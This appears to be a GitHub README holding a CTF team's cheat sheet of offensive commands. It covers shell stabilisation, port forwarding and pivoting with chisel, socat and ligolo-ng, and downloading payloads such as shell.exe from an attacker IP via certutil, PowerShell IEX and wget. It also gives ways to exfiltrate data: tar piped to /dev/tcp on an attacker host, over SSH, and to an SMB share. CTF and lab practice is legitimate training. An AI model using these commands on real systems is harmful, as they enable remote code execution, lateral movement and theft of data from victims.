Skip to content

A collection of commands, tools, techniques and procedures of the purplestorm ctf team.

Notifications You must be signed in to change notification settings

purplestormctf/purplestorm-TTPs

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

51 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ„ΏπŸ…„πŸ…πŸ„ΏπŸ„»πŸ„΄πŸ…‚πŸ…ƒπŸ„ΎπŸ…πŸ„Ό πŸ…ƒπŸ…ƒπŸ„ΏπŸ…‚

A collection of commands, tools, techniques and procedures of the purplestorm ctf team.

Table of Contents

Basics

Stabilizing Linux shell

script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset
screen

Port forwarding

SSH:

On kali:

ssh -N -L 80:localhost:80 user@10.10.10.10 -C

Chisel:

./chisel server -p 8000 --reverse #Server -- Attacker
./chisel client 10.10.16.3:8000 R:100:172.17.0.1:100 #Client -- Victim

Socat:

On victim:

socat tcp-listen:8080,reuseaddr,fork tcp:localhost:9200 &

Netcat:

On victim:

nc -nlvp 8080 -c "nc localhost 1234"

Transfering files

Windows

cmd:

iwr -uri "http://10.10.10.10:8080/shell.exe" -outfile "shell.exe"

wget -O shell.exe 10.10.10.10:8000/shell.exe

certutil -urlcache -f  http://10.10.10.10:8000/shell.exe C:\inetpub\shell.exe

Powershell:

Invoke-WebRequest http://10.10.10.10:8000/shell.exe -OutFile shell.exe

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:8000/shell.exe', 'shell.exe')"

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:8000/something.ps1')"

via SMB:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .    # On attacker

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe    # On target

Linux

wget http://10.10.10.10:8000/some.sh

curl -o some.sh http://10.10.10.10:8000/some.sh

via base64:

cat shell.sh | base64 -w 0   # On attacker
echo <base64encoded> | base64 -d > shell.sh   # On target

via scp:

scp some.sh user@10.10.10.10:/tmp/some.sh   # On attacker

Tooling

Swaks

swaks --server example.com --port 587 --auth-user "user@example.com" --auth-password "password" --to "user@target.com" --from ""user@example.com" --header "Subject: foobar" --body "\\\<LHOST>\x"

Ligolo-ng

Prepare Tunnel Interface

$ sudo ip tuntap add user $(whoami) mode tun ligolo
$ sudo ip link set ligolo up

Setup Proxy on Attacker Machine

$ ./proxy -laddr <LHOST>:443 -selfcert

Setup Agent on Target Machine

$ ./agent -connect <LHOST>:443 -ignore-cert

Configure Session

ligolo-ng Β» session
[Agent : user@target] Β» ifconfig
$ sudo ip r add 172.16.1.0/24 dev ligolo
[Agent : user@target] Β» start

Port Forwarding

[Agent : user@target] Β» listener_add --addr <RHOST>:<LPORT> --to <LHOST>:<LPORT> --tcp

Payloads

Reverse Shell

pip install pwncat-cs
Listener: pwncat-cs 192.168.1.1 4444
(To change from pwncat shell to local shell, use Ctrl+D)

Exfiltrating Data

Linux

via TCP socket, ebcdic and base64

On kali:

nc -nlvp 80 > datafolder.tmp

On target:

tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/10.10.10.10/80

On kali:

dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar
tar xf datafolder.tar

via SSH

On target:

tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"

On kali:

cd /tmp/datafolder

Windows

via SMB server:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -username user -password pass share . -smb2support  # On kali
net use \\10.10.16.5\share /u:user pass   # On victim
copy C:\Users\user\Desktop\somefile.txt \\10.10.16.5\share\somefile.txt   # On victim

via pscp:

pscp Administrator@10.10.10.10:/Users/Administrator/Downloads/something.txt

About

A collection of commands, tools, techniques and procedures of the purplestorm ctf team.

Topics

Resources

Stars

Watchers

Forks

Languages